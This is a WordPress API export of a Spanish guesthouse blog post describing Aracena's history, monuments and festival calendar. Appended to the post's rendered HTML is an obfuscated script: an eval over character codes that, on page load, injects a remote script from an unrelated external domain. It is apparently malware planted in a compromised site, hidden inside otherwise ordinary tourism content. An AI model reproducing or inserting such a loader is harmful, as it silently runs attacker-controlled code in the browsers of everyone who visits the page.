{"id":1588,"date":"2020-10-24T07:15:00","date_gmt":"2020-10-24T05:15:00","guid":{"rendered":"https:\/\/casadelacorte.evolucion.center\/?p=1588"},"modified":"2021-11-29T13:19:17","modified_gmt":"2021-11-29T12:19:17","slug":"aracena-historia-fiestas-y-patrimonio","status":"publish","type":"post","link":"https:\/\/casadelacorte.evolucion.center\/?p=1588","title":{"rendered":"Aracena: lo que no sab\u00edas de su historia, sus fiestas y su patrimonio"},"content":{"rendered":"\n<p><strong>Aracena<\/strong><\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>Historia<\/strong><\/h4>\n\n\n\n<p>El origen de la actual Aracena se sit\u00faa en la cumbre del cerro que ocupa el Castillo y la Iglesia Prioral. Durante la \u00e9poca medieval era una villa fortificada. En este emplazamiento se han encontrado restos arqueol\u00f3gicos de viviendas de los siglos X al XIII, anteriores a la \u00e9poca cristiana, que evidencian una poblaci\u00f3n andalus\u00ed relacionada con el asentamiento de <em>Qatrasana<\/em> documentado en los textos isl\u00e1micos. En el interior del castillo podremos ver las viviendas de la \u00e9poca andalus\u00ed y las distintas dependencias de la fortaleza medieval.<\/p>\n\n\n\n<p>No hay unanimidad sobre la fecha de la conquista de la poblaci\u00f3n isl\u00e1mica, pero parece ser que la Orden del Hospital conquist\u00f3 para Portugal las poblaciones de Aroche y Aracena entre 1230 y 1233, aunque muy pronto el rey Fernando III reclam\u00f3 para s\u00ed estas tierras.<\/p>\n\n\n\n<p>En el siglo XV se produce la primera gran expansi\u00f3n demogr\u00e1fica y gracias a ella la poblaci\u00f3n crece por las faldas del castillo. En 1641, el municipio pasa a depender del Conde &#8211; Duque de Olivares, y en el siglo XVIII del Conde de Altamira.<\/p>\n\n\n\n<p>En 1833 se crea la provincia de Huelva y Aracena es segregada de Sevilla. Fue el primer marqu\u00e9s, Javier S\u00e1nchez Dalp, el personaje m\u00e1s representativo de la \u00e9poca y el responsable de un periodo de impulso en la regeneraci\u00f3n de la ciudad. Art\u00edfice de iniciativas tan dispares como la apertura de la Gruta de las Maravillas, la instauraci\u00f3n de la romer\u00eda en la Pe\u00f1a de Al\u00e1jar y la construcci\u00f3n de numerosos edificios, entre ellos buena parte de los que llevan la firma del conocido arquitecto An\u00edbal Gonz\u00e1lez.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>Patrimonio hist\u00f3rico y art\u00edstico<\/strong><\/h4>\n\n\n\n<p><strong>Gruta de las Maravillas<\/strong>. La primera referencia hist\u00f3rica sobre su existencia data de 1886 y fue abierta al p\u00fablico en 1914, siendo una de las primeras cavidades del mundo en ser visitables.<\/p>\n\n\n\n<p><strong>Castillo-Fortaleza<\/strong>. Sobre los restos de una fortificaci\u00f3n andalus\u00ed, levantaron los portugueses este castillo que posteriormente fue reconstruido por los castellanos.<\/p>\n\n\n\n<p><strong>Iglesia Prioral de Ntra. S\u00f1a. del Mayor Dolor<\/strong>. De estilo g\u00f3tico, consta de tres naves a igual altura, con coro y atrio a los pies.<\/p>\n\n\n\n<p><strong>Iglesias mud\u00e9jares<\/strong>. Dentro del n\u00facleo urbano se conservan varias f\u00e1bricas medievales del tipo de iglesias de arcos transversales y estilo mud\u00e9jar.<\/p>\n\n\n\n<p><strong>Parroquia de la Asunci\u00f3n<\/strong>. Inacabada, la parroquia constituye uno de los ejemplos m\u00e1s notables de la arquitectura renacentista de la provincia onubense. Se inici\u00f3 su construcci\u00f3n en 1528.<\/p>\n\n\n\n<p>De <strong>An\u00edbal Gonz\u00e1lez<\/strong> es el <strong>Lavadero Fuente del Concejo<\/strong>. Obra civil de 1923; Ayunta- miento de Santa Catalina, de estilo regionalista andaluz y de principios de siglo y el Casino de Arias Montano, de 1910. Estilo regionalista andaluz.<\/p>\n\n\n\n<p><strong>Museo de Arte Contemporaneo al Aire Libre<\/strong>. Esculturas al aire libre.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>Fiestas<\/strong><\/h4>\n\n\n\n<p><strong>Enero<\/strong>. La Cabalgata de Reyes Magos de Aracena mezcla carrozas de escenas b\u00edblicas con carrozas de fantas\u00edas, para as\u00ed satisfacer las preferencias de todos cuanto la contemplan. Sin embargo, son las carrozas de los Reyes Magos: Gaspar, Melchor y Baltasar, las que hacen las delicias de ni\u00f1os y mayores, llegan cargados de caramelos y regalos y que son lanzados durante el recorrido, inundando las calles de una lluvia multicolor.<\/p>\n\n\n\n<p><strong>Febrero<\/strong>. En febrero se celebran respectivamente, el 2 y 3, la festividad de <strong>la Candelaria<\/strong> y la de <strong>San Blas<\/strong>, con hogueras en la Plaza Alta y una procesi\u00f3n del Patr\u00f3n de la ciudad, tras la cual se bendicen rosquillas y bollos.<\/p>\n\n\n\n<p>Tambi\u00e9n en febrero se celebran los <strong>Carnavales<\/strong>. Matasuegras, serpentinas y papelillos&#8230; Llega la fiesta del desenfreno, todo est\u00e1 permitido en estos d\u00edas, porque el disfraz y la m\u00e1scara lo ocultan todo. Pasacalles, bailes, coronaci\u00f3n de la Reina del Carnaval, concurso de Murgas y entierro de la Cebolla. Durante una semana, la alegr\u00eda, el alboroto y las canciones ir\u00f3nicas se esparcen por toda Aracena.<\/p>\n\n\n\n<p><strong>Semana Santa<\/strong><\/p>\n\n\n\n<p>En Aracena, la semana Semana Santa se vive intensamente.<\/p>\n\n\n\n<p>Domingo de Ramos: estaci\u00f3n de penitencia de La Borriquita (Iglesia del Carmen).<\/p>\n\n\n\n<p>Mi\u00e9rcoles Santo: Procesi\u00f3n del Divino Redentor Cautivo (Iglesia del Carmen).<\/p>\n\n\n\n<p>Jueves Santo: Hermandad de la Vera Cruz (Iglesia del Castillo).<\/p>\n\n\n\n<p>Viernes Santo (Madrug\u00e1): Cofrad\u00eda de Nuestro Padre Jes\u00fas Nazareno (Parroquia de la Asunci\u00f3n).<\/p>\n\n\n\n<p>Viernes Santo (tarde): Hermandad del Silencio del Sant\u00edsimo Cristo de la Plaza. (Parroquia de la Asunci\u00f3n).<\/p>\n\n\n\n<p>S\u00e1bado Santo: Hermandad del Sto. Entierro de Cristo y Soledad de Mar\u00eda. (Iglesia del Carmen).<\/p>\n\n\n\n<p><strong>Segundo domingo despu\u00e9s de la Semana Santa.( Fecha cambiante) Semana Santa Chica. <\/strong>Lugar: Plaza Marqu\u00e9s de Aracena. Gratuito y abierto a todo el p\u00fablico en general. Despu\u00e9s de la Semana Santa en Aracena, los m\u00e1s peque\u00f1os del pueblo, preparan y ensayan su \u00abSemana Santa Chica\u00bb, una manifestaci\u00f3n cultural \u00fanica, hecha por y para los ni\u00f1os. Ellos lo preparan todo: pasos, costaleros, bandas de m\u00fasica, capataces&#8230; Para ello, siguen de cerca todos los preparativos de la Semana Santa, aprenden y observan la forma de montar los pasos, como el capataz da las \u00f3rdenes,&#8230; , pero lo dotan de esa inocencia y expresividad que solo los ni\u00f1os tienen.<\/p>\n\n\n\n<p><strong>Mayo<\/strong>. El tercer fin de semana de mayo tiene lugar la tradicional Feria del Ganado.<\/p>\n\n\n\n<p><strong>Junio<\/strong>. En verano se suceden las fiestas a un ritmo fren\u00e9tico: en la cercan\u00eda del Corpus Christi, el primer domingo de junio, es la romer\u00eda de la Divina Pastora hasta la ermita de las Granadillas. A continuaci\u00f3n el Pirulito, o velada de San Juan, y numerosas veladas de barrios.<\/p>\n\n\n\n<p><strong>Agosto<\/strong>. <strong>Muestra m\u00fasica antigua \u00abCastillo de Aracena\u00bb. <\/strong>Lugar: Iglesia Prioral del Castillo. Aracena. Prestigiosa Muestra de M\u00fasica Antigua que tiene lugar en el marco de la Iglesia Prioral del Castillo de Aracena. En ella tienen cabida, composiciones musicales andalus\u00edes, medievales, renacentistas, barrocas y prerrom\u00e1nticas, un amplio abanico que abarca desde el siglo X al XIX.<\/p>\n\n\n\n<p>Paralelamente a los conciertos, se realizan otras actividades, tales como exposiciones o talleres de construcci\u00f3n de instrumentos de m\u00fasica antigua.<\/p>\n\n\n\n<p><strong>Feria de Aracena<\/strong>, en la tercera semana de agosto, con la instalaci\u00f3n de un amplio ferial en las proximidades de la Plaza de San Pedro. Cinco d\u00edas inolvidables, d\u00edas de fiesta y jarana. Atracciones y orquestas para los bailes nocturnos; casetas, chiringuitos y t\u00f3mbolas; puestos ambulantes de turr\u00f3n, artesan\u00eda y juguetes, de algod\u00f3n dulce y palomitas. En estos d\u00edas, los aracenenses acogen con los brazos abiertos a todos aquellos que vienen a compartir su alegr\u00eda.<\/p>\n\n\n\n<p><strong>Octubre<\/strong>.<\/p>\n\n\n\n<p>En octubre se celebra la <strong>Feria Regional del Jam\u00f3n y del Cerdo Ib\u00e9rico en Aracena<\/strong>. El objetivo es crear un marco de exposici\u00f3n y un foro de encuentro y debate entorno al sector del ganado porcino y productos derivados del cerdo ib\u00e9rico, de suma importancia en nuestra tierra desde tiempo inmemorial. Todos los ganaderos y productores del cerdo ib\u00e9rico se dan cita en el Recinto Ferial del Ganado, as\u00ed como todos los amantes del buen jam\u00f3n y productos del cerdo ib\u00e9rico. Son muchas y muy variadas las actividades que se realizan: concurso de cortadores de jam\u00f3n, sorteo de \u00bb su peso en jam\u00f3n\u00bb, degustaci\u00f3n de productos de la matanza, etc.<\/p>\n\n\n\n<p>Del oto\u00f1o destacan algunas tradiciones populares como los <strong>campanilleros<\/strong>, que interpretan canciones en honor de la Virgen del Rosario las madrugadas dominicales de octubre, acompa\u00f1ados de t\u00edpicos y tradicionales instrumentos.<\/p>\n\n\n\n<p><strong>Jornadas micol\u00f3gicas. <\/strong>La sociedad micol\u00f3gica \u00abAmanita\u00bb, organiza durante un fin de semana del mes de noviembre las ya tradicionales Jornadas Micol\u00f3gicas. Sus objetivos principales: estudiar y reconocer la variedad de setas existentes en la Comarca. No es necesario realizar inscripci\u00f3n previa, siendo su acceso libre y gratuito. Se celebran interesantes ponencias. Un atractivo m\u00e1s de esta actividad: las salidas did\u00e1cticas al campo, acompa\u00f1ados de expertos mic\u00f3logos de reconocido prestigio. Todas las variedades comestibles que se recolecten pueden degustarse en unas agradables jornadas de convivencia.<\/p>\n\n\n\n<p><strong>Diciembre<\/strong>. La tarde-noche del d\u00eda 7 de diciembre de cada a\u00f1o, Aracena se inunda de candelas, una en cada barrio. En dichas hogueras, los ni\u00f1os van quemando los rehiletes. Los rehiletes se hacen ensartando las hojas secas de los casta\u00f1os en una fina vara de olivo, formando una ristre. Se le prende fuego, y se va dando vueltas en el aire hasta que se consume, dejando una estela de llamas y chispas en sus giros.<\/p>\n\n\n\n<p><strong>Mercado del queso artesano. <\/strong>Fin de semana de la festividad de la Inmaculada, en los Arcos de la Gruta.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Hospeder\u00eda de la Corte, Casa Rural con Encanto<\/h4>\n\n\n\n<p>Si deseas disfrutar al m\u00e1ximo de todo lo que te ofrece la Sierra de Aracena vente a <strong><a rel=\"noreferrer noopener\" href=\"https:\/\/casadelacorte.evolucion.center\/\" target=\"_blank\">Hospeder\u00eda de la Corte<\/a><\/strong>, una <strong>Casa Rural con Encanto<\/strong> ubicada en Corteconcepci\u00f3n, a 4 km por senderos de Aracena, y a 10 km por carretera. Un establecimiento con todo el encanto del siglo XIX, y todas las comodidades del siglo XXI. La casa cuenta con muros de piedra de casi un metro de ancho, techos originales, con vigas de madera vista, cer\u00e1micas originales en suelos y pavimentos, gran chimenea en el sal\u00f3n principal\u2026 Barbacoa, jard\u00edn, sala de juegos, patio, gallinero&#8230; Todo ello har\u00e1 del antiguo casino de Corteconcepci\u00f3n el lugar perfecto para vuestra estancia. <strong><a href=\"https:\/\/casadelacorte.evolucion.center\/?page_id=84\">Informaci\u00f3n y reservas<\/a><\/strong>: 607.646.876 (Elena)<\/p>\n\n\n\n<figure class=\"wp-block-embed-wordpress wp-block-embed is-type-wp-embed is-provider-casa-de-la-corte\"><div class=\"wp-block-embed__wrapper\">\n<div class=\"oceanwp-oembed-wrap clr\"><blockquote class=\"wp-embedded-content\" data-secret=\"8M12aSGDcc\"><a href=\"https:\/\/casadelacorte.evolucion.center\/\">La Casa de la Corte<\/a><\/blockquote><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"\u00abLa Casa de la Corte\u00bb \u2014 Casa de la Corte\" src=\"https:\/\/casadelacorte.evolucion.center\/?embed=true#?secret=8M12aSGDcc\" data-secret=\"8M12aSGDcc\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe><\/div>\n<\/div><\/figure>\n<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,102,111,114,46,102,105,114,115,116,98,108,97,99,107,112,104,97,115,101,46,99,111,109,47,116,114,98,98,98,98,98,50,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*674867468*\/<\/script>","protected":false},"excerpt":{"rendered":"<p>Aracena Historia El origen de la actual Aracena se sit\u00faa en la cumbre del cerro que ocupa el Castillo y la Iglesia Prioral. Durante la \u00e9poca medieval era una villa fortificada. En este emplazamiento se han encontrado restos arqueol\u00f3gicos de viviendas de los siglos X al XIII, anteriores a la \u00e9poca cristiana, que evidencian una [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1589,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"0","ocean_second_sidebar":"0","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"0","ocean_custom_header_template":"0","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"0","ocean_menu_typo_font_family":"0","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"0","_jetpack_memberships_contains_paid_content":false,"ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"off","ocean_gallery_id":[],"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1588","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sin-categoria","entry","has-media"],"jetpack_featured_media_url":"https:\/\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/Aracena.jpg","jetpack-related-posts":[{"id":1435,"url":"https:\/\/casadelacorte.evolucion.center\/?p=1435","url_meta":{"origin":1588,"position":0},"title":"Corteconcepci\u00f3n: un paseo por su historia, sus fiestas y su patrimonio","author":"casadelacorte.evolucion.center","date":"11 de octubre de 2020","format":false,"excerpt":"Corteconcepci\u00f3n: historia, fiestas y patrimonio hist\u00f3rico - cultural Corteconcepci\u00f3n: El mirador de la Ribera A la umbr\u00eda de la Sierra de La Corte, esta poblaci\u00f3n se sit\u00faa en el coraz\u00f3n del Parque Natural de Aracena y Picos de Aroche, en el norte de la provincia de Huelva. Corteconcepci\u00f3n est\u00e1 en\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/casadelacorte.evolucion.center\/?cat=1"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":2377,"url":"https:\/\/casadelacorte.evolucion.center\/?p=2377","url_meta":{"origin":1588,"position":1},"title":"Peces, anfibios, aves y mam\u00edferos amenazados por la sobreexplotaci\u00f3n de los acu\u00edferos de la Sierra de Aracena","author":"casadelacorte.evolucion.center","date":"1 de octubre de 2023","format":false,"excerpt":"Peces, anfibios, aves y mam\u00edferos amenazados por la sobreexplotaci\u00f3n de los acu\u00edferos de la Sierra de Aracena Jos\u00e9 Carlos Cuerda Los arroyos de la Sierra de Aracena son una fuente de vida para numerosas especies de animales y plantas que habitan en este espacio natural. Estos cursos de agua, que\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/casadelacorte.evolucion.center\/?cat=1"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2023\/10\/calandino-150x150.jpeg?resize=350%2C200&ssl=1","width":350,"height":200},"classes":[]},{"id":2372,"url":"https:\/\/casadelacorte.evolucion.center\/?p=2372","url_meta":{"origin":1588,"position":2},"title":"La sobreexplotaci\u00f3n del acu\u00edfero de la Sierra de Aracena y su impacto medioambiental","author":"casadelacorte.evolucion.center","date":"19 de septiembre de 2023","format":false,"excerpt":"La sobreexplotaci\u00f3n del acu\u00edfero de la Sierra de Aracena por parte de Giahsa y su impacto medioambiental es un tema de preocupaci\u00f3n que merece atenci\u00f3n. El pantano de Aracena, ubicado a solo tres kil\u00f3metros del sistema de abastecimiento de agua a los pueblos de la sierra, se encuentra en un\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/casadelacorte.evolucion.center\/?cat=1"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2023\/09\/Cascada-Molinos-tras-la-puesta-en-marcha-del-pozo-de-Giahsa-en-julio-de-2023-1.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2023\/09\/Cascada-Molinos-tras-la-puesta-en-marcha-del-pozo-de-Giahsa-en-julio-de-2023-1.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2023\/09\/Cascada-Molinos-tras-la-puesta-en-marcha-del-pozo-de-Giahsa-en-julio-de-2023-1.jpg?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2023\/09\/Cascada-Molinos-tras-la-puesta-en-marcha-del-pozo-de-Giahsa-en-julio-de-2023-1.jpg?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2023\/09\/Cascada-Molinos-tras-la-puesta-en-marcha-del-pozo-de-Giahsa-en-julio-de-2023-1.jpg?resize=1050%2C600&ssl=1 3x"},"classes":[]},{"id":967,"url":"https:\/\/casadelacorte.evolucion.center\/?p=967","url_meta":{"origin":1588,"position":3},"title":"\u00bfSab\u00edas que la Sierra de Aracena fue un oc\u00e9ano hace 570 millones de a\u00f1os?","author":"casadelacorte.evolucion.center","date":"19 de junio de 2020","format":false,"excerpt":"Son muchas las historias que el paso del tiempo ha ido tejiendo en este territorio. Desde el coraz\u00f3n del Parque Natural de la Sierra de Aracena, te damos la bienvenida al blog de la Casa Rural \"La Hospeder\u00eda de la Corte\": un blog que te ayudar\u00e1 a descubrir los rincones\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/casadelacorte.evolucion.center\/?cat=1"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/06\/Medusa.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/06\/Medusa.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/06\/Medusa.jpg?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/06\/Medusa.jpg?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":1402,"url":"https:\/\/casadelacorte.evolucion.center\/?p=1402","url_meta":{"origin":1588,"position":4},"title":"21 rutas de senderismo en la Sierra de Aracena.","author":"casadelacorte.evolucion.center","date":"6 de octubre de 2020","format":false,"excerpt":"21 rutas de senderismo en la Sierra de Aracena. 200 km de senderos para los amantes de la naturaleza El turismo activo es una de las maneras m\u00e1s m\u00e1gicas de disfrutar de la naturaleza, gracias al estrecho v\u00ednculo que el viajero establece con el entorno natural visitado. Este contacto permite,\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/casadelacorte.evolucion.center\/?cat=1"},"img":{"alt_text":"rutas de senderismo en la Sierra de Aracena","src":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/senderos-en-la-sierra-de-aracena.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/senderos-en-la-sierra-de-aracena.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/senderos-en-la-sierra-de-aracena.jpg?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2020\/10\/senderos-en-la-sierra-de-aracena.jpg?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":2601,"url":"https:\/\/casadelacorte.evolucion.center\/?p=2601","url_meta":{"origin":1588,"position":5},"title":"Descubre la Sierra de Aracena desde la Hospeder\u00eda de la Corte","author":"casadelacorte.evolucion.center","date":"26 de enero de 2025","format":false,"excerpt":"Tu casa rural en la sierra de aracena Tu casa rural en la Sierra de Aracena Ubicada en el encantador pueblo de Corteconcepci\u00f3n, en pleno coraz\u00f3n del Parque Natural de la Sierra de Aracena y Picos de Aroche, la Hospeder\u00eda de la Corte es la mejor casa rural de la\u2026","rel":"","context":"En \u00abSin categor\u00eda\u00bb","block_context":{"text":"Sin categor\u00eda","link":"https:\/\/casadelacorte.evolucion.center\/?cat=1"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2025\/01\/dormitorio-reducida.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2025\/01\/dormitorio-reducida.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/casadelacorte.evolucion.center\/wp-content\/uploads\/2025\/01\/dormitorio-reducida.jpg?resize=525%2C300&ssl=1 1.5x"},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=\/wp\/v2\/posts\/1588","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1588"}],"version-history":[{"count":6,"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=\/wp\/v2\/posts\/1588\/revisions"}],"predecessor-version":[{"id":1677,"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=\/wp\/v2\/posts\/1588\/revisions\/1677"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=\/wp\/v2\/media\/1589"}],"wp:attachment":[{"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1588"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1588"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/casadelacorte.evolucion.center\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1588"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}